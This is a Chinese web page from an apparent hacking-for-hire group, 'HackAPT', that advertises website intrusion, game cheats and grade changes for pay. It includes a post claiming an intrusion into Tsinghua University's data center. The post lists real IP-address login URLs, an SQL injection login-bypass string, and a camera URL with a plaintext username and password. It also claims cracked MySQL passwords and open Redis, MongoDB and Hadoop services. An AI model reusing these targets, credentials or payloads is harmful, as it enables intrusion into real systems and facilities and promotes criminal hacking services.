HackAPT-打造中国最专业的黑客入侵技术 - 承接一切黑客渗透测试业务

入侵清华大学数据中心

HackAPT - 打造中国最专业的黑客入侵技术长期承接国内外网站入侵,网络渗透,外挂开发,成绩修改等相关黑客业务. 本团队拥有多位资深老牌黑客,技术实力雄厚有着长期的职业黑客经验并且长期持有CEH,CCIE黑客认证,且长期活跃于Hackone排行榜并帮助过Facebook, Microsoft, Uber, Yahoo日本发现过重大漏洞. 我们的承诺和信心来自于多年入侵经验的成功案例,我们用实力来得到您的认可客服QQ:10172680 邮箱[email protected]

本站所有内容均属于本站原创,请尊重版权转载请附上本站链接.

http://166.111.9.20:802/View/Login.aspx

http://166.111.9.20:803/View/Login.aspx

http://166.111.9.22:802/View/Login.aspx

http://166.111.9.22:803/View/Login.aspx

http://166.111.9.22:8088/View/Login.aspx

全是这个系统。

漏洞证明:

用户名存在注入。

直接使用admin'OR'a'='a/admin'OR'a'='a

这时候点登录没有反应。

然后在进入web根目录,就直接登录了。

你们两台机器的mysql密码都被我破解了。

费了我1毛钱。

同时两台都开着redis,而且都可以未授权访问。

远程开门:

读取温湿度:

远程开灯:

还有读取摄像头的IF内嵌页面地址为:

http://166.111.9.22:8088/View/RealTimeMonitoringManage/VideocamMonitoringManage.aspx?ip=172.18.3.82&Sport=80&Sname=admin&Spwd=rzxhadmin168&SChannel=0

你们不觉得泄漏了点什么么?

而且这种URL审查源码后还是有泄漏,这个input表单是怎么回事?

C段有个Mongodb未授权访问。

http://166.111.9.231:8088/cluster/nodes

http://166.111.9.231:8088/logs/

hadoop未授权访问。

本文系作者个人观点,转载请注明出处!
喜欢 2

相关文章

更多

本站已经正式停止QQ联系方式,如有任何正在合作的客户或有意合作的客户可以通过  [email protected] 跟我们联系!

邮件24小时在线,通常1-2小时会回复!

error: